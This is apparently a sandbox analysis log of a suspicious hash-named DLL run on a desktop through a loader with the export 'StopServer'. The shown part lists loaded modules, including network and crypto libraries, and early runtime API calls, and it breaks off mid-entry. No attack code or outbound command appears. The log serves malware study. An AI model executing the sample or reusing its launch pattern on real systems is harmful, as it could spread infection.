region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1210 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1211 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1212 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1213 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1214 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1215 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1216 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1217 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1218 start_va = 0x720000 end_va = 0x8a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1219 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1220 start_va = 0x8b0000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1221 start_va = 0xa40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1222 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1223 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1224 start_va = 0x1e40000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 1225 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1226 start_va = 0x1e40000 end_va = 0x1efffff monitored = 0 entry_point = 0x1e60da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1227 start_va = 0x1f50000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 1228 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 1230 start_va = 0x1e40000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 1231 start_va = 0x1f60000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1232 start_va = 0x2160000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1237 start_va = 0x2560000 end_va = 0x2d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1238 start_va = 0x2d60000 end_va = 0x3d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 1390 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 1392 start_va = 0x3d30000 end_va = 0x4066fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1395 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1396 start_va = 0x4070000 end_va = 0x42f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1438 start_va = 0x4070000 end_va = 0x41b9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1443 start_va = 0x4070000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 2004 start_va = 0x4070000 end_va = 0x5602fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 2082 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2083 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2084 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2085 start_va = 0x4070000 end_va = 0x4239fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 2088 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2089 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2090 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2092 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2094 start_va = 0x4070000 end_va = 0x41d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 2096 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Thread: id = 30 os_tid = 0x4bc [0102.481] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0102.482] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0102.482] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0102.482] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0102.482] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0102.482] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0102.483] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0102.483] GetProcessHeap () returned 0x460000 [0102.483] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0102.483] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0102.483] GetLastError () returned 0x7e [0102.483] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0102.483] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0102.483] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x3c8) returned 0x46c2f0 [0102.483] SetLastError (dwErrCode=0x7e) [0102.484] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1200) returned 0x473440 [0102.485] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0102.485] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0102.485] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0102.485] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0102.485] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StopServer" [0102.485] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StopServer" [0102.485] GetACP () returned 0x4e4 [0102.485] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x228) returned 0x465350 [0102.485] IsValidCodePage (CodePage=0x4e4) returned 1 [0102.485] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0102.485] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0102.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0102.485] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0102.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0102.486] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0102.486] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0102.486] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0102.486] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0102.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0102.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0102.486] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0102.486] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0102.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0102.486] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x100) returned 0x472be0 [0102.486] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0102.486] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x168) returned 0x469a70 [0102.486] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0102.486] GetLastError () returned 0x0 [0102.486] SetLastError (dwErrCode=0x0) [0102.486] GetEnvironmentStringsW () returned 0x474650* [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x9cc) returned 0x475030 [0102.487] FreeEnvironmentStringsW (penv=0x474650) returned 1 [0102.487] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x118) returned 0x469ea0 [0102.487] RtlAllocateHeap 